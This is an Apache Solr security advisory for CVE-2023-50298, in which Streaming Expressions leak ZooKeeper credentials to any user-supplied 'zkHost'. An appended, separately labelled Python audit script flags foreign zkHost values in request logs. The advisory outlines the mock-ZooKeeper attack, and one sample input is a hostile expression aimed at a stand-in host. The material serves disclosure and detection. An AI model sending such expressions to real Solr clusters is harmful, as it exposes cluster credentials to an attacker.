Severity: low

Affected versions:

- Apache Solr 6.0.0 through 8.11.2
- Apache Solr 9.0.0 before 9.4.1

Description:

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in
Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from
9.0.0 before 9.4.1.

Solr Streaming Expressions allow users to extract data from other Solr Clouds,
using a "zkHost" parameter.
When the original SolrCloud is set up to use ZooKeeper credentials and ACLs,
they will be sent to whatever "zkHost" the user provides.
An attacker could set up a server to mock ZooKeeper that accepts ZooKeeper
requests with credentials and ACLs and extracts the sensitive information,
then send a streaming expression using the mock server's address in "zkHost".
Streaming Expressions are exposed via the "/streaming" handler, with "read"
permissions.

Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the 
issue.
From these versions on, only zkHost values that have the same server address
(regardless of chroot), will use the given ZooKeeper credentials and ACLs when
connecting.

This issue is being tracked as SOLR-17098.

Credit:

Qing Xu (reporter)

References:

https://solr.staged.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions
https://solr.apache.org
https://www.cve.org/CVERecord?id=CVE-2023-50298
https://issues.apache.org/jira/browse/SOLR-17098
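
An added audit example (not part of the advisory and not Solr's own code): it applies the rule stated above, same ZooKeeper server address regardless of chroot, to streaming expressions taken from request logs and returns any zkHost value that points somewhere else. The host names, the sample expressions, the function names and the choice to compare server lists as sets are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

ZK_DEFAULT_PORT = "2181"  # ZooKeeper client port assumed when an entry omits it

# zkHost as a named parameter of a streaming expression, quoted or bare.
ZKHOST_RE = re.compile(r'zkHost\s*=\s*(?:"([^"]*)"|([^,\s)"]+))', re.IGNORECASE)

def zk_servers(zk_host):
    """Set of host:port entries in a ZooKeeper connect string, chroot ignored."""
    servers = zk_host.strip().split("/", 1)[0]  # drop the "/chroot" suffix
    result = set()
    for entry in servers.split(","):
        entry = entry.strip().lower()
        if not entry:
            continue
        host, sep, port = entry.rpartition(":")
        if not sep or entry.endswith("]"):  # no port given (incl. bare IPv6)
            host, port = entry, ZK_DEFAULT_PORT
        result.add(f"{host}:{port}")
    return frozenset(result)

def foreign_zk_hosts(expr, cluster_zk_host):
    """zkHost values in a (possibly URL-encoded) expression that do not name
    the cluster's own ZooKeeper servers. Assumption: set equality is required."""
    own = zk_servers(cluster_zk_host)
    flagged = []
    for m in ZKHOST_RE.finditer(unquote_plus(expr)):
        value = m.group(1) if m.group(1) is not None else m.group(2)
        if zk_servers(value) != own:
            flagged.append(value)
    return flagged

# Constructed sample data: the cluster's connect string and three expressions.
CLUSTER_ZK = "zk1.example.internal:2181,zk2.example.internal:2181/solr"
SAMPLES = [
    'search(logs, zkHost="zk2.example.internal:2181,zk1.example.internal/other", q="*:*")',
    "expr=search(logs%2C+zkHost%3D%22203.0.113.10%3A2181%22%2C+q%3D%22*%3A*%22)",
    'search(logs, q="*:*", fl="id", sort="id asc")',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(foreign_zk_hosts(sample, CLUSTER_ZK), "<-", sample)
```

On versions before 8.11.3 or 9.4.1, any value this returns is a destination that would have received the cluster's ZooKeeper credentials and ACLs.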
